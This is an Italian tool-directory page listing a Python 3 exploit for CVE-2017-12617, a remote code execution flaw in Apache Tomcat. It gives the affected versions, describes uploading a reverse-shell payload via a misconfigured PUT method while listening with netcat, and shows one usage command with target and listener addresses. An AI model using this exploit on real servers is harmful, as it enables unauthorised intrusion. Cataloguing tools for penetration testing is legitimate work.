Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-12617 — CVE-2017-12617 è una vulnerabilità critica che porta all'esecuzione di codice remoto (RCE) in Apache Tomcat. | Kitploit
Strumenti/GitHubGitHub/longwayhomie/cve-2017-12617
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHublongwayhomie/cve-2017-12617

CVE-2017-12617

CVE-2017-12617 è una vulnerabilità critica che porta all'esecuzione di codice remoto (RCE) in Apache Tomcat.

Vedi Repository
44 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-12617

CVE-2017-12617 è una vulnerabilità critica che porta all'esecuzione di codice remoto (RCE) in Apache Tomcat.
Questa vulnerabilità funziona sulle versioni 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Testata solo su 8.0.24. La vulnerabilità sfrutta l'opzione PUT malconfigurata sull'applicazione o sull'istanza Tomcat stessa.
Utilizza PUT per inviare un payload di reverse shell al server ed eseguirlo, mentre si è in ascolto con netcat.

Poiché in Internet ci sono molte versioni dello stesso exploit ma basate su python2, l'ho riscritto per funzionare con Python 3.
Buon divertimento.

Esempio di utilizzo: python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555

Screen

Scarica lo strumento